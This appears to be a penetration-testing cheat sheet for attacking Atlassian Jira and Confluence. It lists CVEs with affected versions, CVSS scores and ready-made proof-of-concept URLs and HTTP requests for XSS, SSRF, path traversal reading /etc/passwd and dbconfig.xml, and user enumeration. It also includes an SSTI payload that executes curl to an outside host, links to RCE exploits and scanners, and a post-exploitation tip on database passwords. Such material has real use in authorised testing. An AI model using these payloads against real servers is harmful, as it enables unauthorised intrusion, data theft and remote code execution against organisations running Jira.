Jira

Exploits

Unauth LFR: https://github.com/xhs-d/CVE-2023-26256

Unauth get groups: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-39960.yaml

Auth bypass 2 RCE: https://github.com/Pear1y/CVE-2022-0540-RCE

Unauth LFR: https://github.com/ColdFusionX/CVE-2021-26086

Check Privileges

Privileges Required: None POC:

Copy

https://<JIRA>/rest/api/2/mypermissions
https://<JIRA>/rest/api/3/mypermissions

Registration

Privileges Required: None POC:

Copy

https://<JIRA>/servicedesk/customer/user/signup
https://<JIRA>/jira/projects #Sign in button

POC:

Copy

GET /servicedesk/customer/user/signup HTTP/1.1
Host: {{Hostname}}

POST /servicedesk/customer/user/signup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Origin: {{RootURL}}
Referer: {{RootURL}}/servicedesk/customer/user/signup

{"email":"","fullname":"{{randstr}}","password":"","captcha":"","secondaryEmail":""}

GET /secure/Signup!default.jspa HTTP/1.1
Host: {{Hostname}}

POST /secure/Signup.jspa HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: {{RootURL}}
Referer: {{RootURL}}/secure/Signup.jspa

email=&fullname={{randstr}}&username=&password=&Signup=Sign+up

XSS

CVE-2018-5230

Version: < 7.6.6, 7.7.0 <= x < 7.7.4, 7.8.0 <= x < 7.8.4, 7.9.0 <= x < 7.9.2 (Jira version) CVSS 3.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None POC: https://<JIRA>/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm

CVE-2018-20824

Version: < 7.13.1 (Jira version) CVSS 3.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None POC: https://<JIRA>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)

CVE-2019-3402

Version: < 7.13.1, 8.0.0 <= x < 8.1.1 (Jira version) CVSS 3.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None POC: https://<JIRA>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

CVE-2019-8444

Version: 7.7 <= x < 7.13.6, 8.0.0 <= x < 8.3.2 (Jira version) CVSS 3.x: 5.4 MEDIUM AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N Privileges Required: Low POC:

Copy

POST /rest/api/2/issue/TEST-7/comment HTTP/1.1
Host: <JIRA>
Content-Length: x
Content-Type: application/json

{"body":"!image.png|width=\\\" οnmοuseοver=alert(333);//!"}

CVE-2021-26078

Version: < 8.5.14, 8.6.0 <= x < 8.13.6, 8.14.0 <= x < 8.16.1 (Jira version) CVSS 3.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None POC: https://www.exploit-db.com/exploits/50068

CVE-2007-0885

Version: ??? (Rainbow with the Zen (Rainbow.Zen) extension) CVSS 2.x: 6.8 MEDIUM AV:N/AC:M/Au:N/C:P/I:P/A:P Privileges Required: None POC: https://<JIRA>/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e

CVE-2020-9344

Version: < 8.8.2 (Jira Subversion ALM for Enterprise) CVSS 2.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None POC:

Copy

https://<JIRA>/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
https://<JIRA>/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS'
https://<JIRA>/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
https://<JIRA>/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test'
https://<JIRA>/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'

SSRF

CVE-2017-9506

Version: 1.3.0 <= x < 1.9.12, 2.0.0 <= x < 2.0.4 (The IconUriServlet of the Atlassian OAuth Plugin version) CVSS 3.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None Explanation: This vulnerability allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery POC: https://<JIRA>/plugins/servlet/oauth/users/icon-uri?consumerUri=https://colaborator

CVE-2019-8451

Version: < 8.4.0 (Jira version) CVSS 3.x: 6.5 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N Privileges Required: None POC: https://<JIRA>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:[email protected]

CVE-2022-26135

Version: 8.0.0 <= x < 8.13.22, 8.14.0 <= x < 8.20.10, 8.21.0 <= x < 8.22.4 (Jira version) Version: 4.0.0 <= x < 4.13.22, 4.14.0 <= x < 8.20.10, 4.21.0 <= x < 4.22.4 (Jira Management Server and Data Center version) CVSS 3.x: 6.5 MEDIUM AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N Privileges Required: Low POC:

Copy

POST /rest/nativemobile/1.0/batch HTTP/2
Host: <JIRA>
Cookie: JSESSIONID=...; seraph.rememberme.cookie=...; atlassian.xsrf.token=...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: https://<JIRA>
Referer: https://<JIRA>/plugins/servlet/desk
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 63

{"requests":[{"method":"GET","location":"@example.com"}]}

Path Traversal / File Read / File Include

CVE-2019-3396

Version: < 6.6.12, 6.7.0 <= x < 6.12.3, 6.13.0 <= x < 6.13.3, 6.14.0 <= x < 6.14.2 (The Widget Connector macro in Atlassian Confluence Server) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: JIRA
...

{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler(.)com/v/23464dc5","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}

CVE-2020-29453

Version: < 8.5.11, 8.6.0 <= x < 8.13.3, 8.14.0 <= x < 8.15.0 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

CVE-2021-26086

Version: < 8.5.14, 8.6.0 <= x < 8.13.6, 8.14.0 <= x < 8.16.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

/_/;/WEB-INF/web.xml
/_/;/WEB-INF/decorators.xml
/_/;/WEB-INF/classes/seraph-config.xml
/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
/_/%3B/WEB-INF/web.xml
/_/%3B/WEB-INF/decorators.xml
/_/%3B/WEB-INF/classes/seraph-config.xml
/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties

CVE-2019-8442

Version: < 7.13.4, 8.0.0 <= x < 8.0.4, 8.1.0 <= x < 8.1.1 (Jira version) CVSS 3.x: 7.5 HIGH AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Privileges Required: None POC: /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

CVE-2021-26085

Version: < 7.4.10, 7.5.0 <= x < 7.12.3 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://github.com/ColdFusionX/CVE-2021-26085

CVE-2021–26086

Version: < 8.5.14, 8.6.0 <= x < 8.13.6, 8.14.0 <= x < 8.16.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

https://github.com/ColdFusionX/CVE-2021-26086
https://www.cloudsek.com/threatintelligence/jira-software-server-cve-2021-26086-vulnerability-actively-exploited-in-the-wild

CVE-2023-26255

Version: < 2.0.52 ("STAGIL Navigation for Jira - Menu & Themes" plugin) CVSS 3.x: 7.5 HIGH AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Privileges Required: None POC: https://<JIRA>/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime

CVE-2023-26256

Version: < 2.0.52 ("STAGIL Navigation for Jira - Menu & Themes" plugin) CVSS 3.x: 7.5 HIGH AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Privileges Required: None POC: https://<JIRA>/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime

User Enumeration

CVE-2019-3403

Version: < 7.13.3, 8.0.0 <= x < 8.0.4, 8.1.0 <= x < 8.1.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/rest/api/2/user/picker?query=<user_name_here>

CVE-2020-14181

Version: < 7.13.6, 8.0.0 <= x < 8.5.7, 8.6.0 <= x < 8.12.0 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/secure/ViewUserHover.jspa?username=<uname>

CVE-2020-36289

Version: < 8.15.13, 8.6.0 <= x < 8.13.5, 8.14.0 <= x < 8.15.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

CVE-2021-39127

Version: < 8.5.10, 8.6.0 <= x < 8.13.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Privileges Required: None Explanation: There are other things which can be enumerated and extracted via JQL, not only usernames!!! POC: https://<JIRA>/secure/QueryComponent!Jql.jspa?jql=creator=<username>

CVE-2019-8446

Version: < 8.3.2 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

POST /rest/issueNav/1/issueTable HTTP/1.1
Host: <JIRA>
Connection: Close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Atlassian-Token: no-check
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{'jql':'project in projectsLeadByUser("{{randstr}}")'}

POC:

Copy

POST /rest/issueNav/1/issueTable HTTP/1.1
Host: <JIRA>
Connection: Close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Atlassian-Token: no-check
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

startIndex=0&filterId=...&jql=creator%20<USERNAME>&layoutKey=split-view

Sensitive Information Disclosure

CVE-2020-14179

Version: < 8.5.8, 8.6.0 <= x < 8.11.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/secure/QueryComponent!Default.jspa

Unauthenticated Popular Filters

Privileges Required: None POC:

Copy

https://<JIRA>/secure/ManageFilters.jspa?filterView=popular
https://<JIRA>/secure/ManageFilters.jspa?filterView=search
https://<JIRA>/secure/ConfigurePortalPages!default.jspa?view=popular
https://<JIRA>/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false

Unauthenticated Dashboards

Privileges Required: None POC: https://<JIRA>/rest/api/2/dashboard?maxResults=100

Resolution

Privileges Required: None POC: https://<JIRA>/rest/api/2/resolution

Admin Project Dashboard Accessible

Privileges Required: None POC: https://<JIRA>/rest/menu/latest/admin

Project Group Found

Privileges Required: None POC: https://<JIRA>/rest/api/2/projectCategory?maxResults=100

CVE-2020-36287

Version: < 8.13.5, 8.14.0 <= x < 8.15.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

https://<JIRA>/secure/QueryComponent!Default.jspa
https://<JIRA>/secure/Dashboard.jspa
https://<JIRA>/rest/dashboards/1.0/10000/gadget/{ID}/prefs

POC: https://github.com/f4rber/CVE-2020-36287

Jira Unauthenticated Access to screens

Privileges Required: None POC: https://<JIRA>/rest/api/2/screens

Atlassian Connect Descriptor

Privileges Required: None POC: https://<JIRA>/atlassian-connect.json

Jira Unauthenticated Installed gadgets

Privileges Required: None POC: https://<JIRA>/rest/config/1.0/directory

User Information Disclosure

CVE-2019-8449

Version: < 8.4.0 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true

via UserPickerBrowser

Privileges Required: Low, but sometimes can be None Explanation: It is a complete list of every user’s username and email address. There are three standard user groups in Jira: Administrators, Jira Users, and Anyone. For one reason or another, an administrator may grant the ‘Anyone’ group access to this functionality. This grants anyone access to the function – even anonymous users. POC: https://<JIRA>/secure/popups/UserPickerBrowser.jspa

SSTI

CVE-2019-11581

Version: 4.4.0 <= x < 7.6.14, 7.7.0 <= x < 7.13.5, 8.0.0 <= x < 8.0.3, 8.1.0 <= x < 8.1.2, 8.2.0 <= x < 8.2.3 (Jira version) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

a. Navigate to https://<JIRA>/secure/ContactAdministrators!default.jspa
b. Try SSTI payload in subject and/or body:
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://xyz.burp(.)net').waitFor()

CVE-2021-39115

Version: < 4.13.9, 4.14.0 <= x < 4.18.0 (Jira Service Management Server and Data Center versions) CVSS 3.x: 7.2 HIGH AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Privileges Required: High POC: https://github.com/PetrusViet/CVE-2021-39115

CVE-2021-43947

Version: < 8.13.15, 8.14.0 <= x < 8.20.3 (Jira version) CVSS 3.x: 7.2 HIGH AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Privileges Required: High Explanation: It is same CVE as CVE-2021-39115, but with patch bypass Article: https://mp.weixin.qq.com/s?__biz=Mzk0NTU5Mjg0Ng==&mid=2247491370&idx=1&sn=38fcc8290467b597c06d46455a1f0120&source=41#wechat_redirect

RCE

CVE-2021-26084

Version: < 6.13.23, 6.14.0 <= x < 7.4.11, 7.5.0 <= x < 7.11.6, 7.12.0 <= x < 7.12.5 (Confluence Server and Data Center versions) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

https://github.com/alt3kx/CVE-2021-26084_PoC
https://github.com/0xf4n9x/CVE-2021-26084

CVE-2022-0540

Version: < 8.13.18, 8.14.0 <= x < 8.20.6, 8.21.0 <= x < 8.22.0 (Jira version) Version: < 4.13.18, 4.14.0 <= x < 4.20.6, 4.21.0 <= x < 4.22.0 (Jira Service Management Server and Data Center) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

https://github.com/Pear1y/CVE-2022-0540-RCE
https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

CVE-2024-21683

Version: 5.2, 7.19.0, 7.20.0, 8.0.0, 8.1.0, 8.2.0, 8.3.0, 8.4.0, 8.5.0, 8.6.0, 8.8.0, 8.7.1, 8.9.0 (Confluence Server and Data Center versions) CVSS 3.x: 7.2 HIGH AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Privileges Required: High POC:

Copy

https://github.com/W01fh4cker/CVE-2024-21683-RCE

CVE-2022-1471

Version: https://confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC
https://github.com/falconkei/snakeyaml_cve_poc

CVE-2022-26134

Version:

Copy

All supported versions of Confluence Server and Data Center are affected.
Confluence Server and Data Center versions after 1.3.0 are affected.

CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC: https://github.com/hev0x/CVE-2022-26134

Project Key Enumeration

CVE-2020-14178

Version: < 7.13.7, 8.0.0 <= x < 8.5.8, 8.6.0 <= x < 8.12.0 (Jira version) CVSS 3.x: 7.5 HIGH AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Privileges Required: None POC:

Copy

a. Navigate to <JIRA_URL>/browse.<project_key>
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.

Interesting Routes

Administrative and System Endpoints

/secure/admin/
- /secure/admin/ViewSystemInfo.jspa: System information page.
- /secure/admin/WebSudoAuthenticate.jspa: WebSudo (admin re-authentication) page.
- /secure/admin/AttachFile.jspa: File attachment for administrative tasks.
/plugins/servlet/
- /plugins/servlet/gadgets/dashboard: Gadgets dashboard.
- /plugins/servlet/streams: Activity streams.
- /plugins/servlet/oauth: OAuth endpoints.
- /plugins/servlet/applinks/auth: Application links authentication.
/rest/api/2/
- /rest/api/2/user: User information and management.
- /rest/api/2/group: Group management.
- /rest/api/2/project: Project management.
- /rest/api/2/configuration: Configuration settings.
- /rest/api/2/search: Advanced search capabilities.
/rest/servicedeskapi/
- /rest/servicedeskapi/servicedesk: Service desk information.
- /rest/servicedeskapi/request: Customer request management.
- /rest/servicedeskapi/organization: Organization management.
- /rest/servicedeskapi/queue: Service desk queues.
- /rest/servicedeskapi/customer: Customer information.
/secure/
- /secure/CommentAssignIssue!default.jspa: Assign issues and comment.
- /secure/DeleteComment!default.jspa: Delete comments.
- /secure/EditIssue!default.jspa: Edit issues.
- /secure/ManageFilters.jspa: Manage filters.
/rest/plugins/1.0/
- /rest/plugins/1.0/available: Available plugins.
- /rest/plugins/1.0/com.atlassian.jira.plugins.jira-development-integration-plugin-key: Plugin-specific endpoints.

Specific Administrative Files

Copy

/secure/admin/AttachFile.jspa
/secure/admin/WebSudoAuthenticate.jspa
/secure/admin/ProjectRoles.jspa
/secure/admin/NotificationSchemes.jspa
/secure/admin/IssueSecuritySchemes.jspa
/secure/admin/PermissionSchemes.jspa
/secure/admin/FieldLayoutSchemes.jspa

General API Endpoints

Copy

/rest/auth/1/session
/rest/api/2/field
/rest/api/2/issue
/rest/api/2/mypermissions
/rest/api/2/myself
/rest/api/2/priority
/rest/api/2/resolution
/rest/api/2/status
/rest/api/2/user/search

Workflow and Permissions

Copy

/secure/admin/workflows
/secure/admin/ViewWorkflows.jspa
/secure/admin/ViewWorkflowSchemeAssociations.jspa
/secure/admin/AddFieldToScreen.jspa
/secure/admin/ViewFieldScreens.jspa
/secure/admin/ManageSharedEntities.jspa

Additional Security-Sensitive Endpoints

Copy

/rest/servicedeskapi/request/{requestId}/attachment
/rest/servicedeskapi/request/{requestId}/sla
/rest/servicedeskapi/request/{requestId}/status
/rest/servicedeskapi/request/{requestId}/action
/rest/servicedeskapi/request/{requestId}/approval
/rest/servicedeskapi/servicedesk/{serviceDeskId}/customer

Projects

/jira/projects

Documentation

Copy

https://docs.atlassian.com/jira-servicedesk/REST/3.6.2/#servicedeskapi/request-getMyCustomerRequests

Improper Authorization

CVE-2023-22518

Version: All versions are affected (Confluence Data Center and Server) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

https://github.com/ForceFledgling/CVE-2023-22518
https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment

CVE-2023-22515

Version: 8.0.0, 8.0.1, 8.0.2, 8.0.3, 8.0.4, 8.1.0, 8.1.1, 8.1.3, 8.1.4, 8.2.0, 8.2.1, 8.2.2, 8.2.3, 8.3.0, 8.3.1, 8.3.2, 8.4.0, 8.4.1, 8.4.2, 8.5.0, 8.5.1 (Confluence Data Center and Confluence Server) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

https://github.com/j3seer/CVE-2023-22515-POC
https://github.com/Chocapikk/CVE-2023-22515

CVE-2022-26138

Version: 2.7.34, 2.7.35, and 3.0.2 (The Atlassian Questions For Confluence app for Confluence Server and Data Center) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

https://github.com/alcaparra/CVE-2022-26138
https://github.com/z92g/CVE-2022-26138

CVE-2019-20101

Version: < 8.13.3, 8.14.0 <= x < 8.14.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

/rest/whitelist/<version>/check
/rest/whitelist/1/check?url=http://ya.ru

Atlassian JIRA Setup - Installer

Privileges Required: None POC: https://<JIRA>/secure/SetupMode!default.jspa

CVE-2019-8446

Version: < 8.3.2 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

POST /rest/issueNav/1/issueTable HTTP/1.1
Host: <JIRA>
Connection: Close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Atlassian-Token: no-check
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{'jql':'project in projectsLeadByUser("{{randstr}}")'}

CVE-2022-39960

Version: < 1.0.3 (Jira Netic Group Export add-on) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
Host: <JIRA>
Content-Type: application/x-www-form-urlencoded

groupexport_searchstring=&groupexport_download=true

Other

Jira Login Check

Copy

POST /rest/gadget/1.0/login HTTP/1.1
Host: <JIRA>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close

os_username={{username}}&os_password={{password}}

Atlassian Crowd Login Panel

https://<JIRA>/crowd/console/login.action

Jira Rest API Server Information

https://<JIRA>/rest/api/latest/serverInfo

Jira Service Desk Login Panel

Copy

https://<JIRA>/servicedesk/customer/user/login"
https://<JIRA>/servicedesk/customer/portal/10/user/login"

Tools

Copy

- https://github.com/0x48piraj/Jiraffe
- https://github.com/random-robbie/Jira-Scan
- https://github.com/bcoles/jira_scan
- https://github.com/justSTAG/jirascan
- https://posts.specterops.io/sowing-chaos-and-reaping-rewards-in-confluence-and-jira-7a90ba33bf62
- https://github.com/MayankPandey01/Jira-Lens
- https://github.com/NetSPI/JIG
- https://github.com/netspooky/jLoot

Post-Exploit

dbconfig.xmlpasswd contains database password

PreviousWord Press NextConfluence

Last updated 1 year ago